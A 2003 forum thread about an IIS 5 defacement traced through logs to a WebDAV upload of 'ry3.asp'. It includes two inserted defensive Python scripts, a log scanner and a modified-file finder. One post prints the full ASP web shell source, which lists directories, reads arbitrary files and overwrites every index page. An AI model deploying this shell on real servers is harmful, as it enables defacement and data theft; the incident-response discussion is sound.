-
December 8th, 2003, 03:28 PM
#11
Senior Member
Originally posted here by mark_boyle2002
On another note, ever noticed how these Uber l33t haxors that manage to bypass your security and deface your web page have absolutely no HTML skill at all?
I mean, have you ever seen a page defaced with anything decent?
Heheh, my favorites are the ones that go:
We ownz j00!
Some shouts to b00b00, lil may may, destruktor........etc
You would think these super smart people might have something more to say than just handing the feds a list of IRC names of their friends.
-
December 8th, 2003, 03:29 PM
#12
Junior Member
The firewall we're using is a WatchGuard Firebox III 1000 with SW version 4.61.
Again, in the firewall log I've seen only entries with the allowed status on port 80 to the attacked server; all others were denied, so I think it must be some kind of exploit, but how, it isn't clear to me yet.
-
December 8th, 2003, 03:39 PM
#13
Member
Interesting. I assume you are blocking SYN packets also?
What sort of web site is this? Do you run ASP pages that have posting capabilities? E-commerce? I'd almost imagine this is some sort of permissions problem where a script has too much authority or some such. Any data on what the web site in question does might help there. With IIS 5 I'm guessing you aren't using any CGI/Perl, just straight ASP and HTML?
-
December 8th, 2003, 04:24 PM
#14
Junior Member
You might be right!
I just found this in one of the logs:
2003-12-06 17:02:53 62.2.17.117 - W3SVC73 195.65.107.213 80 GET /index.htm - 200 0 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1) - -
2003-12-06 17:49:18 200.222.218.109 - W3SVC73 195.65.107.213 80 GET /index.htm - 200 0 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) - -
2003-12-06 17:49:38 200.222.218.109 - W3SVC73 195.65.107.213 80 OPTIONS / - 200 0 Microsoft+Data+Access+Internet+Publishing+Provider+Protocol+Discovery - -
2003-12-06 17:49:38 200.222.218.109 - W3SVC73 195.65.107.213 80 PROPFIND / - 207 0 Microsoft+Data+Access+Internet+Publishing+Provider+DAV - -
2003-12-06 17:49:41 200.222.218.109 - W3SVC73 195.65.107.213 80 PROPFIND / - 207 0 Microsoft+Data+Access+Internet+Publishing+Provider+DAV - -
2003-12-06 17:49:41 200.222.218.109 - W3SVC73 195.65.107.213 80 PROPFIND / - 207 0 Microsoft+Data+Access+Internet+Publishing+Provider+DAV - -
2003-12-06 17:49:50 200.222.218.109 - W3SVC73 195.65.107.213 80 HEAD /ry3.asp - 404 0 Microsoft+Data+Access+Internet+Publishing+Provider+DAV - -
2003-12-06 17:49:51 200.222.218.109 - W3SVC73 195.65.107.213 80 PUT /ry3.asp - 201 0 Microsoft+Data+Access+Internet+Publishing+Provider+DAV - -
2003-12-06 17:49:56 200.222.218.109 - W3SVC73 195.65.107.213 80 GET /ry3.asp - 200 0 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98) - -
2003-12-06 17:50:12 200.222.218.109 - W3SVC73 195.65.107.213 80 POST /ry3.asp - 200 0 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98) ASPSESSIONIDCARRCDAR=LAIACKICACHCKHNMEMFDHPMC http://ht...y3.asp
2003-12-06 17:50:32 200.222.218.109 - W3SVC73 195.65.107.213 80 GET /ry3.asp - 200 0 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98) ASPSESSIONIDCARRCDAR=LAIACKICACHCKHNMEMFDHPMC -
2003-12-06 17:50:36 200.222.218.109 - W3SVC73 195.65.107.213 80 DELETE /ry3.asp - 401 0 Microsoft+Data+Access+Internet+Publishing+Provider+DAV ASPSESSIONIDCARRCDAR=LAIACKICACHCKHNMEMFDHPMC -
Now I have to take a closer look at the script permissions....
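The log excerpt above tells the whole story in the cs-method column: discovery (OPTIONS, PROPFIND), an upload (PUT returning 201), and then ordinary GET/POST requests to the file that was just uploaded. The following scanner is an added example, not code from this thread or from any of its posters; it parses IIS W3C extended log lines in the 15-field layout seen above and flags WebDAV authoring traffic and the "uploaded-then-executed" pattern. The sample log is constructed (documentation-range addresses, a placeholder session cookie) and only mirrors the sequence from the post.

```python
"""Scan IIS W3C extended log lines for WebDAV authoring activity and for an
uploaded resource that is subsequently requested (i.e. executed by IIS).

Assumption: the log uses the 15-field layout visible in the thread:
date time c-ip cs-username s-sitename s-ip s-port cs-method cs-uri-stem
cs-uri-query sc-status sc-win32-status cs(User-Agent) cs(Cookie) cs(Referer).
IIS escapes spaces inside fields as '+', so whitespace splitting is safe.
"""
from collections import Counter
from dataclasses import dataclass
from typing import Dict, Iterable, List, Optional

FIELDS = ["date", "time", "c_ip", "cs_username", "s_sitename", "s_ip", "s_port",
          "cs_method", "cs_uri_stem", "cs_uri_query", "sc_status",
          "sc_win32_status", "cs_user_agent", "cs_cookie", "cs_referer"]

# WebDAV methods that change content on the server.
DAV_WRITE_METHODS = {"PUT", "DELETE", "MKCOL", "MOVE", "COPY", "PROPPATCH"}
# Methods used to discover whether authoring is enabled at all.
DAV_PROBE_METHODS = {"OPTIONS", "PROPFIND"}
# Extensions IIS 5 hands to the ASP script engine.
EXECUTABLE_EXT = (".asp", ".asa", ".cer", ".cdx")


@dataclass
class Finding:
    kind: str        # dav-probe | dav-write | dav-write-denied | uploaded-script-executed
    client: str      # c-ip
    path: str        # cs-uri-stem
    timestamp: str   # "date time" as logged


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Return a field dict for one log record, or None for directives/short lines."""
    if line.startswith("#"):
        return None
    parts = line.split()
    if len(parts) != len(FIELDS):
        return None
    return dict(zip(FIELDS, parts))


def scan(lines: Iterable[str]) -> List[Finding]:
    """Walk the log once, remembering successful PUTs per (client, path) so a
    later GET/POST to that path from the same client can be tied back to it."""
    findings: List[Finding] = []
    uploaded = set()
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        method, path, status = rec["cs_method"], rec["cs_uri_stem"], rec["sc_status"]
        client, ts = rec["c_ip"], f'{rec["date"]} {rec["time"]}'
        if method in DAV_PROBE_METHODS:
            findings.append(Finding("dav-probe", client, path, ts))
        elif method in DAV_WRITE_METHODS:
            ok = status.startswith("2")
            findings.append(Finding("dav-write" if ok else "dav-write-denied", client, path, ts))
            if method == "PUT" and ok:
                uploaded.add((client, path))
        elif method in ("GET", "POST") and (client, path) in uploaded \
                and path.lower().endswith(EXECUTABLE_EXT):
            findings.append(Finding("uploaded-script-executed", client, path, ts))
    return findings


def summarize(findings: List[Finding]) -> Dict[str, int]:
    """Count findings by kind; handy for a one-line triage verdict."""
    return dict(Counter(f.kind for f in findings))


# Constructed sample log (not the thread's real entries): same sequence of
# methods and status codes, documentation-range IPs, placeholder cookie.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-username s-sitename s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status sc-win32-status cs(User-Agent) cs(Cookie) cs(Referer)
2003-12-06 17:49:18 203.0.113.9 - W3SVC73 198.51.100.5 80 GET /index.htm - 200 0 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) - -
2003-12-06 17:49:38 203.0.113.9 - W3SVC73 198.51.100.5 80 OPTIONS / - 200 0 Microsoft+Data+Access+Internet+Publishing+Provider+Protocol+Discovery - -
2003-12-06 17:49:38 203.0.113.9 - W3SVC73 198.51.100.5 80 PROPFIND / - 207 0 Microsoft+Data+Access+Internet+Publishing+Provider+DAV - -
2003-12-06 17:49:50 203.0.113.9 - W3SVC73 198.51.100.5 80 HEAD /ry3.asp - 404 0 Microsoft+Data+Access+Internet+Publishing+Provider+DAV - -
2003-12-06 17:49:51 203.0.113.9 - W3SVC73 198.51.100.5 80 PUT /ry3.asp - 201 0 Microsoft+Data+Access+Internet+Publishing+Provider+DAV - -
2003-12-06 17:49:56 203.0.113.9 - W3SVC73 198.51.100.5 80 GET /ry3.asp - 200 0 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98) - -
2003-12-06 17:50:12 203.0.113.9 - W3SVC73 198.51.100.5 80 POST /ry3.asp - 200 0 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98) ASPSESSIONID=EXAMPLE http://198.51.100.5/ry3.asp
2003-12-06 17:50:36 203.0.113.9 - W3SVC73 198.51.100.5 80 DELETE /ry3.asp - 401 0 Microsoft+Data+Access+Internet+Publishing+Provider+DAV ASPSESSIONID=EXAMPLE -
"""

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG.splitlines()):
        print(f"{f.timestamp}  {f.kind:<26} {f.client:<15} {f.path}")
    print(summarize(scan(SAMPLE_LOG.splitlines())))
```

A PUT answered with 201 on a site that is not meant to be authored remotely is the line worth alerting on by itself; the correlation with a following GET/POST only raises the priority. Run it over the whole W3SVC directory, not just the day of the defacement, since the probing usually starts earlier than the first modified page.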
-
December 8th, 2003, 05:20 PM
#15
Well, it looks to me like your file permissions may be what allowed this to happen.
I looked up this ry3.asp and it appears to make use of Server.CreateObject("Scripting.FileSystemObject") ASP exploit-type code.
Taken from here.
The FileSystemObject is a component often used to access the server's file system. For example, you can create files, read the contents of a file, determine whether or not a folder or file exists, iterate through the contents of a folder, or any other number of file-system related tasks.
Now, the way ASP looks at these things is weird. Basically, when ASP calls Server.CreateObject("Scripting.FileSystemObject"), the anonymous web user ID is used, i.e. IUSR_yourservername. Now, if your file permissions are full access, using this script they have full access to your server.
Here is a similar, if not the same, type of script.
Code:
<%
On Error Resume Next
Set Objeto=Server.CreateObject("Scripting.FileSystemObject")
if request("t5") <> "" then
Set ObjPasta = Objeto.GetFolder(request("t5"))
end if
%>
<%On Error Resume Next
if request("t3") <> "" then
Set ObjPasta2 = Objeto.GetFolder(request("t3"))
set ObjFso=server.CreateObject("Scripting.FileSystemObject")
var_caminho=request("t3")
For Each Pasta in ObjPasta2.Subfolders
Set ObjAbreArq = ObjFso.OpenTextFile(Var_Caminho & "\" & pasta.name & "\index.htm", 2, True, False)
ObjAbreArq.writeline request("t4")
set ObjAbreArq = nothing
Set ObjAbreArq = ObjFso.OpenTextFile(Var_Caminho & "\" & pasta.name & "\index.html", 2, True, False)
ObjAbreArq.writeline request("t4")
set ObjAbreArq = nothing
Set ObjAbreArq = ObjFso.OpenTextFile(Var_Caminho & "\" & pasta.name & "\index.asp", 2, True, False)
ObjAbreArq.writeline request("t4")
set ObjAbreArq = nothing
Set ObjAbreArq = ObjFso.OpenTextFile(Var_Caminho & "\" & pasta.name & "\default.htm", 2, True, False)
ObjAbreArq.writeline request("t4")
set ObjAbreArq = nothing
Set ObjAbreArq = ObjFso.OpenTextFile(Var_Caminho & "\" & pasta.name & "\default.html", 2, True, False)
ObjAbreArq.writeline request("t4")
set ObjAbreArq = nothing
Set ObjAbreArq = ObjFso.OpenTextFile(Var_Caminho & "\" & pasta.name & "\default.asp", 2, True, False)
ObjAbreArq.writeline request("t4")
if err then
response.write "<font color=red><br>Erro em: </font>" & pasta.name
err=0
else
response.write "<br>OK em " & pasta.name
end if
set ObjAbreArq = nothing
next
set ObjFso=nothing
Set ObjPasta2 = nothing
set ObjFso = nothing
end if
%>
<html>
<head>
<title>.</title>
</head>
<body>
<p align="center">Você está em: <%=server.mappath("ry3.asp")%> </p>
<form method="POST" action="ry3.asp">
<p>Caminho: <input type="text" name="T3" size="44"><br>
Texto:<input type="text" name="T4" size="73" value="#affix ownz u - _EviL_"> <input
type="submit" value="Iniciar" name="B1"></p>
</form>
<form method="POST" action="ry3.asp">
<div align="center"><center><p>Prompt: <input type="text" name="T5" size="43"
value="<%=request("t5")%>"><input type="submit" value="Dir" name="B1"></p>
</center></div>
</form>
<div align="center"><center>
<table border="1" width="70%" bordercolor="#FF0000" cellspacing="0" cellpadding="0">
<tr>
<td width="50%"><p align="center">Diretórios Numerados</td>
<td width="50%"><p align="center">Arquivos</td>
</tr>
<tr>
<td width="50%" valign="top"><% On Error Resume Next
dim contador
contador=1
For Each Pasta in ObjPasta.Subfolders
Response.Write Contador & "-) "& Pasta.Name & "<br>"
contador=contador+1
next%>
</td>
<td width="50%" valign="top"><%On Error Resume Next
For Each Arquivo in ObjPasta.Files
Response.Write Arquivo.Name & "<br>"
Next%>
</td>
</tr>
</table>
</center></div>
<form method="POST" action="ry3.asp">
<div align="center"><center><p>Caminho: <input type="text" name="TT" size="39"> <input
type="submit" value="Ver Arquivo" name="B1"></p>
</center></div>
</form>
<%On Error Resume Next
if request("tt") <> "" then
var_caminho=request("tt")
set ObjFso2=server.CreateObject("Scripting.FileSystemObject")
Set ObjAbreArq2 = ObjFso2.OpenTextFile(Var_Caminho, 1, True, False)
Do While Not ObjAbreArq2.AtEndOfStream
Linha = Linha & ObjAbreArq2.Readline & chr(13)
Loop
response.write "<TEXTAREA NAME=sujos ROWS=10 COLS=70>" & Linha & "</TEXTAREA>"
ObjAbreArq2.Close
Set ObjAbreArq2 = Nothing
ObjFso2.close
set ObjFso2 = Nothig
end if%>
</body>
<%set ObjPasta = nothing
set Objeto = nothing%>
</html>
So now the question is: was this ry3.asp script already on your box, or was it put there?
If it was put there, it looks like it was done through HTTP's WebDAV authoring protocol. You may want to have a look at the WebDAV RPCs to see if you left a hole open somewhere.
Well, it's just what I see, and it seems to make sense to me. Go back and take a look at your server's file permissions. This is most likely what allowed this to happen.
-
December 8th, 2003, 05:36 PM
#16
Member
If I was going to deface a page I wouldn't put any effort into it. I mean, then I'd have an attachment to it and have to write my callsign or something, like graffiti, and then the cops come a-knockin'. Somehow I think it's the wrong idea to sign your handiwork in the hacking field..
ALSO note, HTML skills versus GRAPHIC DESIGN skills, there is quite a difference.
-
December 8th, 2003, 05:50 PM
#17
Junior Member
Yes, I think they used this ASP script I found on the web too.
On the script file permissions I saw that for the .asp extension there are POST, GET, HEAD and TRACE permissions. Now, I am not a webmaster (he's sick at the moment); do you think I can delete all except POST and our regular ASP script files would still be executable?
I'm gonna try this...
-
December 8th, 2003, 06:02 PM
#18
Well, it really depends on what their version of the ry3.asp file did. If it is a s'kiddie, they probably did not edit the ASP in it. But if it is someone with a little bit of knowledge, they could have written any code they wanted into your existing ASP files. The Server.CreateObject("Scripting.FileSystemObject") has the ability to append code into files, which means they could have opened up several backdoors into your system. They quite possibly could have gotten into your database and mucked with it also.
They deleted the ry3.asp file from the server, so there is no real way of knowing exactly what they did or did not do. What I would probably do is check the last modified dates of your server's files. Anything modified after the date of the attack is for all intents and purposes lost, and should be removed and replaced with a backup copy. If it were me, I would redo the entire box itself. Once they had control over the server, they easily could have executed commands on the server itself. Check your logs to see if any commands were executed on the box itself, as the FTP user, etc etc...
Getting hacked is no fun at all. Learn from your mistakes, and make sure to check all the file permissions on the server before going live. One of the biggest mistakes webmasters make is to leave a file full access, for ease, and say to themselves "Oh I'll go back later to lock it down". It very rarely happens.
As far as how they got in in the first place? Not sure. You will have to look around your server to see if any web code allows people to upload stuff to your server. If so, that is how they got in.
Happy hunting.
xmad
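xmad's advice to check last-modified dates across the server is the kind of triage that is easy to script. The following is an added example, not code from this thread; it walks a webroot and lists every file whose modification time falls at or after the first suspicious log entry, earliest change first. The webroot it builds is constructed in a temporary directory purely so the script runs stand-alone; point `files_modified_since` at a real copy of the site to use it.

```python
"""List files under a webroot modified at or after a cutoff time.

Assumptions: the cutoff is taken from the first suspicious log entry, and the
tree being examined is an offline copy or a mounted image (run nothing on the
compromised box itself). build_demo_webroot() is a constructed sample.
"""
import os
import tempfile
from datetime import datetime, timezone
from pathlib import Path
from typing import List, Tuple


def files_modified_since(root: Path, cutoff: datetime) -> List[Tuple[str, str]]:
    """Return (relative path, UTC mtime) for each file whose mtime >= cutoff,
    sorted so the earliest change, the likely first foothold, comes first."""
    threshold = cutoff.timestamp()
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = Path(dirpath) / name
            mtime = full.stat().st_mtime
            if mtime >= threshold:
                rel = str(full.relative_to(root)).replace(os.sep, "/")
                hits.append((rel, mtime))
    hits.sort(key=lambda h: h[1])
    return [(rel, datetime.fromtimestamp(m, timezone.utc).strftime("%Y-%m-%d %H:%M:%S"))
            for rel, m in hits]


def build_demo_webroot() -> Path:
    """Constructed sample tree: two start pages rewritten on 2003-12-06 and
    two files untouched since well before the incident."""
    root = Path(tempfile.mkdtemp(prefix="webroot_"))

    def touch(rel: str, when: datetime) -> None:
        p = root / rel
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_text("<html></html>")
        ts = when.timestamp()
        os.utime(p, (ts, ts))  # set both atime and mtime

    touch("index.htm", datetime(2003, 11, 2, 9, 0, tzinfo=timezone.utc))
    touch("site1/index.htm", datetime(2003, 12, 6, 17, 50, 20, tzinfo=timezone.utc))
    touch("site1/default.asp", datetime(2003, 12, 6, 17, 50, 22, tzinfo=timezone.utc))
    touch("data/catalog.mdb", datetime(2003, 10, 15, 0, 0, tzinfo=timezone.utc))
    return root


# Time of the first WebDAV probe in the posted log, used as the cutoff.
ATTACK_START = datetime(2003, 12, 6, 17, 49, tzinfo=timezone.utc)

if __name__ == "__main__":
    root = build_demo_webroot()
    for rel, when in files_modified_since(root, ATTACK_START):
        print(when, rel)
```

Treat the output as a starting list, not proof of integrity: anything with write access to a file can also rewrite its timestamps, so a file that shows an old mtime is not thereby cleared. Comparing content hashes against a backup taken before the incident is the check that does not depend on timestamps at all.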
-
December 8th, 2003, 06:17 PM
#19
Junior Member
I already recovered the files to the point before this happened. All I saw until now is that they uploaded some defaced index.html, default.html, default.asp and index.asp pages (I guess with help of this RY3.asp script). I'm going to delete all of them...
I think I'm going to change our start pages to something else in future, because we made replacing them easy by now...
The database files haven't been touched, so I assume they have been just some dumb script kiddies, but I'll be watchful, observing the logs carefully the next few days to see if there are some strange things occurring...
Thank you all for your support
kind regards
sascha
-
December 8th, 2003, 06:35 PM
#20
By the way, it seems you still have these files on your server. I would get rid of them as soon as possible.